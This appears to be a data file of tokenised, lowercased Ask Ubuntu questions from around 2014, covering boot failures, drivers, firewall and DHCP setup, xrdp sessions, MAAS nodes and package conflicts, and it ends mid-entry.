499021	how do i stop the screen from fading out and powering off , on lock-screen ?	in the office , when i leave my computer , ie . to fetch some coffee , i press super+l and activate the lock-screen . this results in the screens fading to black , and subsequently turning off . while this is beneficial if i am gone for longer periods ( thus it kicks in via timeout ) it is tedious , to have to wait for the screens to power back up , when i am only away for a short period . so , is it possible to disable the immediate screen power-off , when i do a lock - while still keeping the timeout power-off that comes when the computer is idle ?
499025	how much diskspace do i need for ubuntu 14.04 ?	i intend to get myself a new mini-pc with a single ssd . how much diskpace will ubuntu 14.04 need ? is it recommendable to get two seperate disks ? i have following models in mind : shuttle xs35v4 shuttle xs36v4
499026	boot and/or screen problems after each upgrade	after each upgrade my system does not come back . after today 's upgrade i face the same problem again . some cmos battery message and when it goes to the point that it should start loading the os it gets stuck . either on the screen with the `` ubuntu 12.04 '' in the middle and the dots f ; ashing ( and it stays like that , it freezes ther ) . or , if i try through safe mode and graphics etc it goes to a white screen with some wird lines and negative parts of letters ( ? ) and characters ( ? ) , some flashing idea of a cursor an that 's it ! i ca n't see anything , i ca n't do anything . last time i erase all my data and installed a fresh 12.04 version . i am tired of having to do that thing over an over again . i think it must have something to do with my graphic card and screen etc . nvidia has some incompatibility problems i believe sometimes . but how is it possible to have my computer properly working all the time , without me having doen anything t adjust parameters etc ( i have no idea ) and with each upgrade all this gets lost ? i am perfectly happy with ubuntu , but this , i do n't know if i can live with this , having to erase everything an install fresh every now and then . some help please ? ?
499032	allowing web site through shorewall firewall	i 'm fairly new to linux and i 've been following some guides to get a web server up and running . so far all is well with the web server and accessing it from the net . i 've installed shorewall firewall and as soon as i turn it on . everything is blocked . there is a few people who have had a similar issue and they was told to try the following ... in /etc/shorewall/rules add ( notice that the gaps are tabs not spaces ) accept net $ fw tcp 80 accept net $ fw tcp 22 and also the try this ... http/accept net $ fw ssh/accept net $ fw both the above have been tried at the very end of the `` rules '' file . the version i installed using apt-get seems to be newer as it 's missing some of the text referenced to ... like in the `` rules '' file there is no text stating `` # last line '' . so i added each of the above ( two at a time as shown above ) and restarted the firewall and even the whole machine . but it still blocks port 80,443 and 22 . i used the example files `` one-interface '' and copied them over to /etc/shorewall/ . i also edited `` interfaces '' as that was set to eth0 and i 'm using eth1 ( net eth1 ) . any help appreciated ... thanks : )
499033	how to manage freeradius clients throught a web client	i have freeradius running on ubuntu 12.04 server , to authenticate iburst clients of my isp . it is working fine , the only issue is that i do n't know how to manage these clients . for example if a client has not payed to use internet , i need to be able to disconnect him/her and reconnect him/her once the payment has been done . the only way that i know is to edit the /etc/freeradius/users file and comment the framed-ip-address line which is not easy to do every time . also , i fear that i might accidentally damage the file if i continue accessing it everyday and modifying it . i would like to know if there is any other way to do this ( preferably through a web client ) . i found one called dialupadmin web interface , but i do n't know if i have to install freeradius from scratch to be able to use the web interface or if i can just install this and use the existing freeradius without re-installation .
499034	does ubuntu support ups out of the box ?	i have ups that used to work fine on windows before ( had some software installed though ) and now is just connected to the pc without installing anything . well , the moment the electricity goes out the pc shutdowns instantly like there is no ups connected at all . so , do i need to install something generally to work or my ups might have hardware problem ?
499036	lxsession-default tasks broken	using lubuntu . when i hit ctrl-alt-del , it logs me out to the login screen . it 's supposed to bring up the task manager . turns out that `` lxsession-default tasks '' is the problem . i searched , and there is almost nothing on the web about this command . in preference - > default apps for lxsession , i have set the default to task manager . but somehow it 's not working . disgusting really . ubuntu 14.04 lts , lxde . temporary solution : edit ~/.config/openbox/lubuntu-rc.xml find the entry that invokes `` task manager '' , change the command from `` lxsession-default tasks '' to simply `` lxtask '' .
499041	app indicator not showing properly ( sigram )	i 've installed sigram and the app indicator is showing at the left top corner of the `` panel '' as you can see in this photo : i 'm looking for some info but i ca n't find anything related with this problem . thank you in advance !
499044	external hdd permissions	i have a 1 tb external hd from which i used to boot ubuntu . i now have ubuntu installed on my main hd in my computer , and decided to reformat the external drive for basic file storage . i used gparted and removed all partitions and created one big ext4 partition . when i try to move files to it it wo n't let me paste the files in the drive , and when i view permissions on the drive , it says that the owner is root , so i therefore ca n't change permissions . is this an issue of gparted , or did i do something wrong ? i am comfortable using terminal to fix this if necessary , but i remember steps to solve issues better when they 're done via a graphic ui . thanks in advance , adam
499050	setting wireless printer hp laserjet mfp m177fw	i 've just installed color laserjet pro mfp m177fw on my ubuntu 13.10 machine using usb serial port . and scanner also work well . but i still do n't understand how to install wireless printer on it . perhaps u can help me ?
499051	compile qemu-kvm , kvm - how ?	i am using ubuntu 14.04 64 bits and am trying to build kvm - here is what i did according to many messages i saw on this same topic . git clone https : //git.kernel.org/pub/scm/virt/kvm/qemu-kvm.git sudo apt-get install zlib1g-dev ./configure -- target-list=x86_64-softmmu -- disable-werror -- enable-debug so far so good - everything works - now comes : make i get the following : ./qemu-options.texi:1453 : unknown command `list' ./qemu-options.texi:1453 : table requires an argument : the formatter for @ item ./qemu-options.texi:1453 : warning : @ table has text but no @ item make : * [ qemu-doc.html ] error 1 i want to build kvm too - anyone can help ? thanks .
499052	how do i disable the alt + shift + drag shortcut in gnome ?	related to this question , but concerning the `` snappy '' style drag you get with alt + shift + dragging the mouse . this shortcut obscures an important feature i want to use in my ide , so i want to disable it , by i dont see the option in dconf-editor .
499054	problems with ceph installation in juju deployed openstack environment	we are running in to an issue setting up ceph to be used as backend for cinder using the charms . our environment consists of openstack icehouse on ubuntu 14.04 ( trusty ) . most of the documents on ceph indicates we have to use cinder and ceph charms . however the 14.04 release notes mentions using cinder-ceph subordinate charms . with this approach we are unable to get the cinder to use the ceph backend . i was wondering if there are any pointers you have on how to setup cinder and ceph using charms ? thank you , nik
499056	setting up dhcp server - fail to start/stop it	i am following this guide . i am completely new to ubuntu , working on 14.04 lts . when i reach the last step before dealing with kerrighed ( half way through the tutorial ) , i try to start my dhcp server but it fails . root @ master : ~ # /etc/init.d/tftpd-hpa restart root @ master : ~ # /etc/init.d/isc-dhcp-server restart * stopping isc dhcp server dhcpd [ fail ] * starting isc dhcp server dhcpd * check syslog for diagnostics . [ fail ] root @ master : ~ # /etc/init.d/nfs-kernel-server restart * stopping nfs kernel daemon [ ok ] * unexporting directories for nfs kernel daemon ... [ ok ] * exporting directories for nfs kernel daemon ... [ ok ] * starting nfs kernel daemon [ ok ] root @ master : ~ # here is what i got in syslog by typing dmesg : [ 18103.047124 ] nfsd : last server has exited , flushing export cache [ 18104.195774 ] nfsd : using /var/lib/nfs/v4recovery as the nfsv4 state recovery directory [ 18104.195797 ] nfsd : starting 90-second grace period ( net ffffffff81cda240 ) root @ master : ~ # and syslog : jul 17 17:16:11 master dhcpd : wrote 0 deleted host decls to leases file . jul 17 17:16:11 master dhcpd : wrote 0 new dynamic host decls to leases file . jul 17 17:16:11 master dhcpd : wrote 0 leases to leases file . jul 17 17:16:11 master dhcpd : jul 17 17:16:11 master dhcpd : no subnet declaration for eth0 ( no ipv4 addresses ) . jul 17 17:16:11 master dhcpd : ** ignoring requests on eth0 . if this is not what jul 17 17:16:11 master dhcpd : you want , please write a subnet declaration jul 17 17:16:11 master dhcpd : in your dhcpd.conf file for the network segment jul 17 17:16:11 master dhcpd : to which interface eth0 is attached . ** jul 17 17:16:11 master dhcpd : jul 17 17:16:11 master dhcpd : jul 17 17:16:11 master dhcpd : not configured to listen on any interfaces ! jul 17 17:16:17 master rpc.mountd [ 24387 ] : caught signal 15 , un-registering and exiting . jul 17 17:16:17 master kernel : [ 22896.481789 ] nfsd : last server has exited , flushing export cache jul 17 17:16:19 master kernel : [ 22897.636160 ] nfsd : using /var/lib/nfs/v4recovery as the nfsv4 state recovery directory jul 17 17:16:19 master kernel : [ 22897.636192 ] nfsd : starting 90-second grace period ( net ffffffff81cda240 ) jul 17 17:16:19 master rpc.mountd [ 24820 ] : version 1.2.8 starting here is /etc/dhcp/dhcp.config : # general options option dhcp-max-message-size 2048 ; use-host-decl-names on ; deny unknown-clients ; # this will stop any non-node machines from appearing on the cluster network . deny bootp ; # dns settings option domain-name `` kerrighed '' ; # just an example name - call it whatever you want . option domain-name-servers 192.168.1.1 ; # the server 's ip address , manually configured earlier . # information about the network setup subnet 192.168.1.0 netmask 255.255.255.0 { option routers 192.168.1.1 ; # server ip as above . option broadcast-address 192.168.1.255 ; # broadcast address for your network. } # declaring ip addresses for nodes and pxe info group { filename `` pxelinux.0 '' ; # pxe bootloader . path is relative to /var/lib/tftpboot option root-path `` 192.168.1.1 : /nfsroot/kerrighed '' ; # location of the bootable filesystem on nfs server host m4500_1 { fixed-address 192.168.1.101 ; # ip address for the first node , kerrighednode1 for example . hardware ethernet xx : xx : xx : xx : xx : xx ; # mac address of the node 's ethernet adapter } server-name `` kerrighedserver '' ; # name of the server . call it whatever you like . next-server 192.168.1.1 ; # server ip , as above. } ( the mac adress is the correct one in the file ) here is etc/network/interfaces : # the loopback interface : auto lo iface lo inet loopback # auto eth0 # the primary network interface , manually configured to protect nfs : iface eth0 inet static address 192.168.1.1 netmask 255.255.255.0 the connected slave computer ( for the clustering ) says pxe-e51 : no dhcp or proxydhcp offers were received . therefore it looks like the dhcp server is definitiely not runing . tftpd does not give any answer when i restart it in the terminal and nfs looks good though .
499057	how to synchronize 'saved searches ' to an other thunderbird instance	the saved searches of thunderbird are really a nice feature . normally i 'm working on several workstations using several thunderbird instances . is there a way to synchronize the saves searches between to thunderbird instances ?
499058	how much ram will 14.04 need ?	how much ram would ubuntu 14.04 need ? ( usage : a bit of pictureprocessing , maybe an ip-camera stream , ordinary officework , simplecv , some torrentdownloading ) . is 4gb or 8gb better suited for me ?
499060	wake on lan with maas stuck in commissioning ( does not turn on the machine )	i have a maas cluster controller with two nic ( eth0 - 193.51.236.0/24 - connected to public network and p1p1 - 192.168.0.0/24 - used for private maas nodes ) . i use 5 physical machines hp compaq 6000 pro . when i turn on one of these machines , it correctly does pxe boot from the maas cluster controller and in the maas console it is shown as `` declared '' . there is a warning icon next to the hostname with error : this node does not have a power type set and maas will be unable to control it . click 'edit node ' and set one . also , it shows 0 cpu , memory and disk space . when , i update the power type to `` wake-on-lan '' with the correct mac and save , i 'm not able to commission the node . it does not turn on the machine and hangs on the `` commissioning '' status . i checked time is correctly set on the node ( check in bios ) . the wol with the node works just fine , i.e. , i can turn it on using : wakeonlan -i 192.168.0.255 00:23:24:0e:0d : e7 from the maas cluster controller . i have to specify the -i 192.168.0.255 since the default 255.255.255.255 does not do anything . if i turn it on manually ( e.g . using wakeonlan ) it eventually goes into ready state and correctly detects cpu , memory and disk space . again , if i try to start the , it wont do anything , but if i power it on manually , it works just fine . edit : it seems that the problem is related to having two nics - the magic packet is only sent over the eth1 ( even though the cluster is correctly configured indicating p1p1 as the managed interface ) which is incorrect ( sudo tcpdump -i eth1 port 9 -vvvv -s0 -n ) . submitted a bug https : //bugs.launchpad.net/maas/+bug/1343317
499063	ca n't load grub menu on macbook 1,1	i have a first-generation macbook that i had turned into a single boot ubuntu ( 13.04 ) machine sometime last year . i pulled it out for the first time in a while , and found i had forgotten the password . i 've seen the many instructions for resetting a forgotten administrator password , but ten or fifteen restarts later , holding the shift key starting at different points each time , i still ca n't get my machine to boot up into the grub menu . are there any tricks to this , or workarounds ? i wish i could remember more of what my setup was , but i do n't . here 's what i see as it boots up : a grey screen with the apple boot sound , a quick flash of a file folder with a question mark in the middle while still on the grey screen , a blank black screen that briefly displays a type cursor in the upper left , a blank deep purple screen , a series of warnings and errors about not being able to load isight firmware and some render errors , the ubuntu logo and then the sign in screen . thanks .
499064	how to remap keys on one keyboard only ?	i know i can use xinput to remap mouse buttons only on one mouse but leave others unchanged . this is very useful - in my case , i use it two connect to mice to my desktop , one right-handed and the other left-handed . can something like this also be done when there 's more than one keyboard connected ? can i remap keys to other keys on one keyboard , and leave others unchanged ? in my specific case my mouse appears to be registered as an additional keyboard and its 6th and 7th button are translated to pageup and pagedown , i would like to bind them to copy/paste instead - but i do n't want to affect the regular pageup and pagedown keys on my standard keyboard . here 's how the output of xinput looks - the keyboard in question is with id 10 : $ xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ steelseries diablo iii gaming mouse id=9 [ slave pointer ( 2 ) ] ⎜ ↳ steelseries diablo iii gaming mouse id=11 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb optical mouse id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ creative technology ltd sb tactic3d rage usb id=8 [ slave keyboard ( 3 ) ] ↳ steelseries diablo iii gaming mouse id=10 [ slave keyboard ( 3 ) ] ↳ logitech usb keyboard id=13 [ slave keyboard ( 3 ) ] ↳ logitech usb keyboard id=14 [ slave keyboard ( 3 ) ] ↳ hp wmi hotkeys id=15 [ slave keyboard ( 3 ) ]
499065	error while booting xubuntu 14.04	i get a message on the screen every time i load xubuntu 14.04 on my xp mini , which says : '' support for core revisions 0x17 and 0x18 disabled by module paron allhusupport=0 . try013.allhusupport=1 . i 've followed an advise from ubuntu forums and added a kernel parameter foo=bar but it did not help . what else can be done here and what this problem can be related to ?
499070	install virtualbox guest addition terminal	i would like to install virtualbox guest addition using the terminal . because that is most easy to reproduce and to document . on the server i have ubuntu 12.04.2 . lts i have virtualbox 4.3.16 i have done so successfully in the recent past using : bash sudo apt-get update sudo apt-get install build-essential linux-headers- $ ( uname -r ) sudo apt-get install virtualbox-guest-x11 found on how do i install guest additions in a virtualbox vm ? now i repeat doing so . executing : modinfo vboxguest returns : bernard @ bernard-vbox2 : ~ $ modinfo vboxguest filename : /lib/modules/3.11.0-22-generic/updates/dkms/vboxguest.ko version : 4.2.16_ubuntu license : gpl description : oracle vm virtualbox guest additions for linux module author : oracle corporation srcversion : a7e3594189a565bbb270edb alias : pci : v000080eed0000cafesv00000000sd00000000bc*sc*i* depends : vermagic : 3.11.0-22-generic smp mod_unload modversions bernard @ bernard-vbox2 : ~ $ see virtualbox guestaddition version from vm client all seems to work well , but when reboot i have a login screen and i seem to log in . but the screen change to black , and the system hang . even the `` send shutdown signal '' has no effect . only `` power of machine '' can stop the vm . luckely i made a snapshot before installing virtualbox guest additions . i tried twice , but with the identical result . in both situation i had the same ubuntu server version and virtualbox server version . vm ubuntu client is now 13.10 i do not not know the ( possible different ) previous vm ubuntu version . followed sylvain pineay advise with result : dkms : install completed . setting up virtualbox-guest-x11 ( 4.2.16-dfsg-3ubuntu0.1 ) ... configuration file `/etc/x11/xsession.d/98vboxadd-xclient' == > file on system created by you or by a script . == > file also in package provided by package maintainer . what would you like to do about it ? your options are : y or i : install the package maintainer 's version n or o : keep your currently-installed version d : show the differences between the versions z : start a shell to examine the situation the default action is to keep your current version .
499073	i ca n't reach a allocated maas node through ssh	i 'd like to reach a maas node through ssh . when i installed the ubuntu 14.04 using the fast installer , ip address was not assigned to the maas node . so it is not reachable . `` route info failed '' message is appeared after `` wating 120 seconds for network device '' message was shown . i think that network interfaces were n't configured properly in the boot process , but i do n't know how to solve it . but , when using the debian installer , a ip address was correctly assigned to a network interface so i can reach it through ssh . other features ( ipmi and pxe ) are correctly worked . how can i solve this problem ? and where are the log files related to this situation ? please give me a solution or a hint ...
499075	dual boot windows 7 and ubuntu	i am trying to dual boot windows 7 and ubuntu , but i am having issues . first of all , every single tutorial i 've read or watched explains how to do this if you have a windows system already setup , and then to install ubuntu alongside it . that is not what i want to do seeing as i already have ubuntu , but not windows . i downloaded a pre activated win 7 .iso , used unetbootin succesfully to put it on a usb , and rebooted my system . i get the following error : failed to load com32 file menu.c32 then it just displays a prompt , and anything i enter in it it returns that it could not load file . please help me . i am using ubuntu 14.10 really want to have windows and ubuntu , so that i can play games and stuff . thanks
499079	how can i override the title of an x11 window running across an ssh tunnel ?	i am ssh'ing into a server which has a copy of firefox installed on it that i need to run . i can ssh in and run firefox , and it will run remotely as expected . however , i need to frequently have two firefoxes open from two different servers . identifying which one is which at a glance is a little tricky . i can easily script the opening of each remote firefox , but i 'd like to add to that script a mechanism that gets the newly created window and overrides the title to be `` server_xyz '' . or prepends it . or something . i 'd love it to be automatic ( scriptable ) and general ( not firefox-specific ) if it is possible . but if not , manual would be ok. as well , i tried xdotool ( xdotool search -- class firefox set_window -- name `` server '' ) but that would n't override the title of the firefox window .
499081	edca do not prioritize the traffic correctly on atheros card	i am trying to make some tests on my atheros card ( 3com , 11a/b/g wireless card , 3crppag175 ) . i observed that for voice and video packets the band is divided by half . i expected that voice will be threated with the highest priority and video will be limited to the minimal value when the network is saturated . could you advise where is the problem ? in methodology or in the driver ? some details about the env : card : 3com , 11a/b/g wireless card , 3crppag175 card driver : ath5k os : ubuntu 12.04.4 driver sources compiled and loaded to the system : backports-3.11-rc3-1 downloaded from : https : //www.kernel.org/pub/linux/kernel/projects/backports/stable/v3.11-rc3/ how it was tested : sources had been downloaded and compiled card had been configured to work as a ap , hostapd configured , wmm_enabled=1 in hostapd.conf file to symulate the trafic in the network i am using nuttcp on the computer which was connected to my wireles card i started the command : nuttcp -s -on my computer ( ap ) i limited the rate on the interface to 1m : iwconfig wlan1 rate 1m to have few streams with different access category i run thye following command ( in separate teminals to run it simultanously and observe the rate on the console output ) : nuttcp -il -v -u -c 40 -t 60 -p 5002 10.0.0.1 for each stream the port value had been changed to not duplicate them ( -p parameter ) for specify the traffic category i have been changing the 'c ' parameter as follows : -c 8 for bk , -c 0 for be , -c 40 for vi , -c 48 for vo . when test fails ( in my opinion ) : in one terminal : nuttcp -il -v -u -c 40 -t 60 -p 5002 10.0.0.1 in second terminal : nuttcp -il -v -u -c 48 -t 60 -p 5003 10.0.0.1 for both of them the available band had been divided by half but i expected the video will be very limited . do you know what might cause the problems ? thanks in advance .
499084	usb3.0 udev events lag in 14.04	i have an application running on ubuntu 14.04 ( on an intel nuc ) which responds to udev events . i have found using udeavadm monitor that there are lengthy lags in the events being sent . for instance if i repeatedly remove and reinsert the usb eventually the events will stop . after a wait ( +- 30s ) the events appear . i have tested using usb 2.0 and the problem can not be replicated . i have goggled quiet extensively , yet i can not find any information ( specifically on the lag ) . any insight greatly appreciated .
499085	find photos shot by a certain type of camera via terminal	i have a huge collections of photos shot with different cameras on my computer . now , i would like to find all photos which has been shot with a certain camera via the terminal . i think it should be possible to find them according to their exif data ! ?
499086	mirroring screen - > resolution problem	i have a asus n53s laptop , it has a 1920*1080 resolution build in screen . if it matters : gpu is nvidia geforce gt 550m . it has a vga port which i don't/rarely use and a hdmi port . in my hdmi port i plug in an external samsung monitor or tv , both are same hd resolution as my internal screen ( 1920*1080 ) . or nothing when i 'm 'on the road with my laptop ' . now what i want is that my screen is duplicated/mirrored if i plug in one of my other screens in the hdmi port . the problem however : when i check the mirror screen checkbox , the maximum resolution is set to 1024*768 . there is also an 'unknown screen ' in the screen options window , every time i try to change any screen settings , i have to set that unkown screen of because it will make my cursos flicker . so i disable the unkown screen , then mirror my main screen but then the resolution option is limited . i 'm not sure what to do . ps : my ubuntu version is in dutch , so i might not have translated everything correctly .
499088	ubuntu 14.x with xfce4-session desktop - terminates abruptly	i am setting up ubuntu 14.x to use xrdp so that i can use rdp clients to use my computer . i saw several articles which state clearly that you can not use gnome sessions for this . and a work around is to install xfce4 and use that instead . i followed these steps : http : //c-nergy.be/blog/ ? p=5305 i have this working on two other boxes with exact same versions just fine . same version of ubuntu and all updates are installed . but for one of my boxes , the rdp session shows the desktop for a second then poof it terminates me . here is the uname -a for the box : linux xx-vbox1 3.13.0-30-generic # 55-ubuntu smp fri jul 4 21:40:53 utc 2014 x86_64 x86_64 x86_64 gnu/linux and here is lsb_release -a results : no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty .xsession has contents xfce4-session and /etc/xrdp/xrdp.ini has contents : [ globals ] bitmap_cache=yes bitmap_compression=yes port=3389 crypt_level=low channel_code=1 max_bpp=24 # black=000000 # grey=d6d3ce # dark_grey=808080 # blue=08246b # dark_blue=08246b # white=ffffff # red=ff0000 # green=00ff00 # background=626c72 [ xrdp1 ] name=sesman-xvnc lib=libvnc.so username=ask password=ask ip=127.0.0.1 port=-1 [ xrdp2 ] name=console lib=libvnc.so ip=127.0.0.1 port=5900 username=na password=ask [ xrdp3 ] name=vnc-any lib=libvnc.so ip=ask port=ask5900 username=na password=ask [ xrdp4 ] name=sesman-any lib=libvnc.so ip=ask port=-1 username=ask password=ask [ xrdp5 ] name=rdp-any lib=librdp.so ip=ask port=ask3389 [ xrdp6 ] name=freerdp-any lib=libxrdpfreerdp1.so ip=ask port=ask3389 username=ask password=ask [ xrdp7 ] name=sesman-x11rdp lib=libxup.so username=ask password=ask ip=127.0.0.1 port=-1 xserverbpp=24 here is /var/log/xrdp-sesman.log when it logs me out after two attempts : [ 20140717-09:03:19 ] [ info ] scp thread on sck 7 started successfully [ 20140717-09:03:20 ] [ info ] ++ created session ( access granted ) : username irsdownloader , ip 192.168.111.137:52421 - socket : 7 [ 20140717-09:03:20 ] [ info ] starting xvnc session ... [ 20140717-09:03:20 ] [ info ] starting xrdp-sessvc - xpid=6091 - wmpid=6090 [ 20140717-09:03:22 ] [ info ] ++ terminated session : username xxxdownloader , display :15.0 , session_pid 6089 , ip 192.168.xxx.xxx:52421 - socket : 7 [ 20140717-09:18:21 ] [ info ] scp thread on sck 7 started successfully [ 20140717-09:18:21 ] [ info ] ++ created session ( access granted ) : username irsdownloader , ip 192.168.111.xxx:52732 - socket : 7 [ 20140717-09:18:21 ] [ info ] starting xvnc session ... [ 20140717-09:18:21 ] [ info ] starting xrdp-sessvc - xpid=7457 - wmpid=7456 [ 20140717-09:18:23 ] [ info ] ++ terminated session : username xxxdownloader , display :16.0 , session_pid 7455 , ip 192.168.xxx.xxx:52732 - socket : 7 can someone tell me why this is abruptly terminating my session like that ? i was able to use xfce4 in x-windows session , so i am convinced it is my xrdp settings . what am i forgetting ? possible hint : [ xrdp1 ] name=sesman-xvnc lib=libvnc.so username=ask password=ask ip=127.0.0.1 port=-1 if i change the port to 5901 on my xrdp sesman-xvnc connection , i get an error : can not connect . on the other boxes , i am using 5901 just fine .
499089	how to reset hp laserjet 1102 driver ?	i have an hp laserjet p1102 printer which worked fine until today . for some reason , one particular print job would not print . i deleted the job and tried again with no luck . i ever turned off the printer , disconnected it from the computer and logged out and in again to no avail . then , i tried deleting the printer and installing it again and it started working again . so , is there a way to `` reset '' the printer without removing it and adding it again ?
499091	trying to install tp-link archer t2u on ubuntu	i 've just installed ubuntu and i would like to get my usb wifi adapter working . is there anyone who knows where i can get the right drivers for this ? output of lsusb bus 002 device 004 : id 148f:761a ralink technology , corp . bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 064e : c21c suyin corp . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
499095	can not find squid3 service	the service for squid3 does not exist in /etc/init.d/ . if i try to stop or start squid3 , it does not work . i tried purging squid3 and installing again , but to no avail .
499096	how can i unsecure xampp in ubuntu ?	when i access my ip in some other computer it requires username and password , i want no such type of security i want direct access to my xampp , phpmyadmin directory in any computer in same network . i 've attached some snapshots :
499102	ubuntu will not boot from hard drive after installation	i made a live dvd with ubuntu 14.04 for a new toshiba laptop , satellite c55-b5200 . first i found that ubuntu booted easily , though slowly , from dvd . then i selected installation from the grub menu that offered no boot other than dvd . during installation , the installer claimed there was no operating system . ( it did not see windows/8 . ) it said that it was reformatting . after installation the system would not boot at all from hard drive . it said to insert a bootable device and reboot ( words not exact ) . i found info online about `` boot-repair '' . i went through the boot-repair procedure . during the installation of boot-repair there was a message `` /usr/share/boot-sav/gui-g2slaunch.sh line 29 5850 segmentation fault ... '' but boot-repair was installed , so i ran it . it said `` efi detected . please check options . '' there was no clue what options or what to check . but i clicked ok . i then ran bootinfo summary . that seemed to go ok . so i re-ran boot-repair for the repair action . the commands it asked me to paste and run seemed to go ok. after the repair the url is paste.ubuntu.com/7807769 . the machine will not boot anything from the hard drive . while booted from dvd it looked as if ubuntu was on sda2 and that sda1 was vfat . questions re bios : ( 1 ) do i want `` secure boot '' ? ( 2 ) do i want uefi ? should i try to install again ? or are there possible repairs while booted from dvd ? what should i do ? thanks .
499103	how to reset a vm to a previous snapshot ?	i am running ubuntu virtual machine on ubuntu host machine using virtualbox . i installed some softwares on my virtual machine . i wonder if there is a method to reset my current virtual machine to a given previous state ( snapshot ) of my choice ? how can i do that ? how can i reset to a previous snapshot undoing any changes i will make further to my vm ? any method is welcome , especially the ones i can program either in a bash script or any programming language .
499104	sshd_config file is being overwritten on reboot	i need an aws server to accept password authentication and whenever i remove the hash and set passwordauthentication yes after reboot or create image and launch a new instance , the # is added back to the line in the sshd_config file . and then i get permission denied ( publickey ) . does anyone know how to stop this file from being changed ?
499105	fingerprint reader malfunction hp dv7	i have an hp pavilion dv7 with a validity vfs301 fingerprint reader . i have tried multiple fingerprint reading software , including fprint , but all of them give the same problem : it registers that there is a fingerprint reader , and when i scan my finger the first time ( so that i can enrol my fingerprints ) it works fine and records it , but when the software tells me to scan it for the second time ( i think you have to scan it about 5 times in the enrol process ) the scanner will not pick up my fingerprint . after i have restarted the software , the same thing happens : i can scan the first time , but not thereafter . i have discovered that in system settings - > user accounts there is an option for 'fingerprint login ' , but i still get the exact same issue when i try to enrol my fingerprints . does anyone know what the solution might be ? it would be really nice if i could get it working again . thanks in advance !
499107	external usb 3.0 hdd makes loud click sound while shutting down	am using a dell inspiron n4110 14 '' laptop with ocz 60gb ssd as boot/internal hdd . i use an hgst touro 1tb external hdd for my storage needs ( on a usb 3.0 port ) . the system is running on dual-boot configuration with windows 7 ultimate & ubuntu 14.04 ( both fresh installation ) . since couple of days am noticing a loud click from the external drive every time i shut down the laptop from ubuntu . i can confirm that , this is not happening when i shut down from windows ( external drive powers off smoothly without making any audible noise ) . any thoughts , why this is happening in ubuntu but not in windows ? do let me know if i need to provide any system logs .
499108	start a transmission-gtk using a cron job	i 'm trying to start my torrent client using a cron job . following is the job i added to crontab file ( contab -e ) 00 20 17 07 * transmission-gtk i waited for the time but transmission-gtk did n't startup . but when i try a simple command like `` mkdir test '' . it works . any ideas friends
499109	1 depends on 2 but 2 is not going to be installed	on my ubuntu 14.04 , for almost every second package i want to install i get an error : sudo apt-get install 1 depends : 2 but it is not going to be installed . then i try sudo apt-get install 2 get an error depends : 2 but it is not going to be installed . and so on until finally sudo apt-get install n succeeds for some n. then i can install n-1 , ... , 1 . although i could make a script that would `` solve '' the problem for me , is there any better way to solve it ? note , i tried sudo apt-get install -f without any success . i do not have any broken packages either as sudo apt-get check did not report any errors .
499110	problem with the radeon propietary driver	yesterday i switched from debian 7.6 ( wheezy ) to ubuntu 13.10 . in debian following the official tutorial i could install the ati propietary drivers from repositories . but in ubuntu following the official tutorial i could n't install it . my gpu is a ati hd4330 or rv710/m92 ( yes , it 's compatible ) the first way to install it , was from repositories , but when i had to run aticonfig -- initial the return was `` aticonfig is not installed '' . the same happend with amdconfig . the second way to do it from repositories did n't work either , when i tried to run aticonfig -- initial , the return was `` your device is not compatibe '' , or something like that . so i tried to install the ati cathalist , but after installing it , i reboot my compueter , but it was n't working properly , the resolution was 640x480 instead of 1366x768 and when i tried to login the system crashed and it retuned back to the login screen . in tty1 startx does n't work either . thank you
499112	quick question about installing multiple versions of the same package	so two pieces of software that i need on my system have dependencies for libfltk1.1-dev and libfltk1.3-dev . i tried installing both , as when i installed one , it would remove the other . i put in this message . sudo apt-get install libfltk1.1-dev libfltk1.3-dev and i get this the following packages have unmet dependencies : libfltk1.1-dev : conflicts : libfltk-dev libfltk1.3-dev : conflicts : libfltk-dev e : unable to correct problems , you have held broken packages . can i/how do i install both ?
499115	unity 3d suddenly disabled ubuntu 12.04	my unity was always ok since first install in 2012 . i always use unity 3d session , never use 2d session . but now , i have only unity 2d session . i do n't want 2d session , i want my 3d session back . i do n't know why , now i get unity 3d supported : no information while i always can use 3d session before . result from /usr/lib/nux/unity_support_test -p command : opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x300 ) opengl version string : 2.1 mesa 8.0.2 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no result from dpkg -l | grep xorg-video command : ii xserver-xorg-video-ati 1:6.14.99~git20111219.aacbd629-0ubuntu2 x.org x server -- amd/ati display driver wrapper ii xserver-xorg-video-cirrus 1:1.3.2-4build1 x.org x server -- cirrus display driver ii xserver-xorg-video-fbdev 1:0.4.2-4ubuntu2 x.org x server -- fbdev display driver ii xserver-xorg-video-geode 2.11.13-2build1 x.org x server -- geode gx2/lx display driver ii xserver-xorg-video-intel 2:2.17.0-1ubuntu4.4 x.org x server -- intel i8xx , i9xx display driver ii xserver-xorg-video-mach64 6.9.0-1build2 x.org x server -- ati mach64 display driver ii xserver-xorg-video-mga 1:1.4.13.dfsg-4build2 x.org x server -- mga display driver ii xserver-xorg-video-neomagic 1:1.2.5-2build2 x.org x server -- neomagic display driver ii xserver-xorg-video-nouveau 1:0.0.16+git20111201+b5534a1-1build2 x.org x server -- nouveau display driver ii xserver-xorg-video-openchrome 1:0.2.904+svn1050-1 x.org x server -- via display driver ii xserver-xorg-video-qxl 0.0.16-2 x.org x server -- qxl display driver ii xserver-xorg-video-r128 